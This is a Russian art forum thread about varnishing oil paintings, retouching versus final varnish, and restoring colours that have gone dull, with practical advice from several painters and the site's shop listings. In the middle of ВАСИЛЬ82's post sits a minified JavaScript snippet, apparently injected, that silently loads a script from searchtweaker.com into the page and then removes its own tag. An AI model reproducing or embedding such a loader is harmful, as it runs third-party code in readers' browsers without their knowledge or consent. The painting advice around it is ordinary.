Ваша корзинаИзбранноеЛичный кабинет

Сочетание лаков и масляных красок, борьба с пожуханием, последствия

07.01.2013,
22:57
Albert Nihil

Цитата:
Сообщение от Александр Дементьев
А ведь если бы он написал их пастелью, с них бы и волоска не упало, при идеальных-то условиях ))).

Тллько хардкор!Только графический планшет! :-)

07.01.2013,
23:55
kazakova
kazakova

Цитата:
Сообщение от Vezeleva Tatiana
А вообще странно что художнику запах лака важнее чем его качества...

мне есть с чем сравнивать Были старые запасы акрил-фисташкового лака - подарок от одного художника. Лак и сох быстро и запах был терпимый. А новый акрил-стирольный - ужасно воняет, а не пахнет, правда, сохнет быстро.

Так что любителям побыстрее и поострее - в самый раз будет.

08.01.2013,
01:12
Владимир Рогов
Владимир Рогов

Цитата:
Сообщение от Albert Nihil

плюс электрификация всей страны :))

08.01.2013,
01:25
ksy
ksy

Цитата:
Сообщение от Albert Nihil

Ага! Цифра бессмертна!

08.01.2013,
01:36
Александр Дементьев
Александр Дементьев

смеетесь? Железо ржавеет! ))).

08.01.2013,
01:39
ksy
ksy

Цитата:
смеетесь? Железо ржавеет! ))).

Александр, диски пластиковые))

09.01.2013,
15:12
Александр Дементьев
Александр Дементьев

Пластмассовый мир победил
Макет оказался сильней
Последний кораблик остыл
Последний фонарик устал
Кому нужен ломтик июльского неба...

09.01.2013,
17:43
Albert Nihil

Цитата:
Последний фонарик устал Кому нужен ломтик июльского неба...

Отвечу словами того же автора:
но я ещё соберу и приклею отбитые части тела(с)
А если серьёзно,то например, среди дизайнеров интерьера наибольшую ценность представляют именно вручную сделанные эскизы."Ручная подача" они это называют.
В книге Артемия Лебедева "Ководство" есть пример -- перспектива улицы,сделанная в компьютерной программе.Все вертикальные линии наклонены.И он сетует -- вот мол раньше,архитекторы вручную делали,линии прямыми были.
Я 10 лет потратил на разные программы.Не было такой радости от занятий,как сейчас,когда я вновь решил вернуться к своим картинкам,масляным краскам.
Форум классный,очень много нового для себя каждый день узнаю,по поисковым словам.

16.08.2013,
15:34
artlive24

Написал картину маслом на холсте и через некоторое время краска пожухла - исчезла яркость. Каким лаком и как покрывать работу, чтобы восстановить яркость и цвет?

16.08.2013,
18:30
aurora-s
aurora-s

А картину лаком покрывали?

16.08.2013,
18:32
aurora-s
aurora-s

Я имела ввиду - финишным лаком работу покрывали? Я, когда работу долго пишу, ещё покрываю недописанную работу ретушным лаком, а по окончании работы, спустя 1 год, покрываю финишным лаком.
Ретушные лаки м финишные лаки есть разные - разного производителя, разной глянцевости-матовости, разной цены.

16.08.2013,
22:03
artlive24

aurora-s, нет, никиким не покрывал. Работа уже полностью высохла и стала блеклой.
1)Кроме финишного(он так и называется в магазине?) можно ли даммарным лаком(невская палитра) покрыть готовую работу?
2) Ретушный лак для чего используете?

16.08.2013,
23:28
aurora-s
aurora-s

Финишный лак - это лак, покрывающий оконченную, высохшую работу (я покрываю картины примерно через 1 год). Финишный лак может быть как даммарный, так и не дамарный. Мне отечественный дамарный не нравится - долго сохнет, сильно воняет, ну и результат не нравится. Итальянский дамарный лак FERRARIO намного лучше - сохнет быстрее, покрывает ровнее и не так воняет. Я выбрала для себя матовый финишный лак от MAIMERI (Италия) - сохнет буквально несколько часов, почти не воняет и очень оживляет цвет - это не дамарный лак.
ретушный лак я использую когда работа долго (полгода и дольше) стоИт незаконченной. И прежде чем продолжить работу я покрываю работу ретушным лаком - он освежает и оживляет цвета, а так же улучшает сцепление нижних, высохших, слоёв краски с новыми слоями.

31.08.2013,
16:29
asya.art

Fortune

А всё таки ЛАК ОБЯЗАТЕЛЕН ДЛЯ готовой работы или НЕТ? Кто-нить ответит?

Опытные люди говорят, что если картину покрыть лаком, то он лет через 20-30 растрескивается. Но, если картина сильно прожухла, то её надо покрыть лаком. Каким - тут уже писали. А для начала попробуйте протереть половинкой сырой луковицы - она тоже немного освежает цвета. А не удастся - тогда лаком.

31.08.2013,
20:48
ВАСИЛЬ82
ВАСИЛЬ82

Чтобы не жухла соблюдайте технологию.
Покрывать лаком только спустя год!!!, чтоб всё хорошо просохло.Лак в основном защита от пыли, грязи, влаги , и конечно он выравнивает цвета. Можно добавлять лак в масло но опять же нужно соблюдать технологию, а то может потрескаться скукожыться осыпаться и тп.
Что как применять хорошо Киплик описал.Изучите его основательно и выберите для себя подходящий стиль письма , и будет вам счастье.
К стати лаковое покрытие очень не скоро крекалюром пойдёт и если всё хорошо сделаете, то это станет проблемой реставратара
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

02.09.2013,
02:56
Александр Дементьев
Александр Дементьев

Василь, а вы какими красками работаете?

11.09.2013,
15:49
Лена Н

По-моему, эта проблема из ряда тех, с которыми приходится мириться , причем она касалась живописцев во все времена. Пожухание, конечно, портит впечатление, но ...... Это естественная взаимодействие материалов.

21.09.2013,
17:59
Александр Дементьев
Александр Дементьев

эта проблема вполне решается.

23.09.2013,
19:32
Ambrosius
Ambrosius

Александр, там на российском рынке вполне нормальное масло появилось у Невской Палитры (на картинке внизу - Масло льняное уплотненное №2).
Вполне пригодное. А то, что не такое густое, как импортное, так даже и хорошо - с ним в каком-то смысле легче работать.

23.09.2013,
23:05
Александр Дементьев
Александр Дементьев

Михаил, привет! пользовался, знаю. Действительно предотвращает пожухания.. Вообще, сейчас беру холсты у местного мастера - лен 100%, загрунтованы этой краской: http://www.teks.ru/view/90/ . Даже с неуплотненным маслом краски не жухнут. Не знаю по поводу долговечности грунта, но хочется верить, что хороший.
О густых маслах, из последних открытий - краска Белый барит из серии Rublev. Очень прозрачные белила пергаментного цвета, на ореховом и льняном маслах тянущейся медовой консистенции. При смешивании с другой краской очень интересная техника письма вомзожна.

Для того, чтобы оставлять сообщения в форуме, нужно авторизоваться.
Алехнович Геннадий
Цветущий пион
Алехнович Геннадий. Цветущий пион
250 000 р.
Чижова Виктория
Горячий воздух, спасительная прохлада
Чижова Виктория. Горячий воздух, спасительная прохлада
48 000 р.
Столяров Вадим
Наставник
Столяров Вадим. Наставник
612 000 р.
Холодова Лилия
Снегопад Серия литографий Парк Дубки
Холодова Лилия. Снегопад Серия литографий Парк Дубки
6 900 р.
Панов Эдуард
Софийская набережная
Панов Эдуард. Софийская набережная
60 000 р.
Голубцова Надежда
Сад в Живерни
Голубцова Надежда. Сад в Живерни
35 000 р.

Новости культуры Практические советы Наши выставки Рейтинг художественных сайтов Политика защиты и обработки персональных данных О нас, контакты info@artnow.ru

© ArtNow.ru 2003–2026 | Использование материалов, размещенных на сайте, допускается только с согласия их авторов с обязательной ссылкой на ArtNow.ru

Работа добавлена в корзину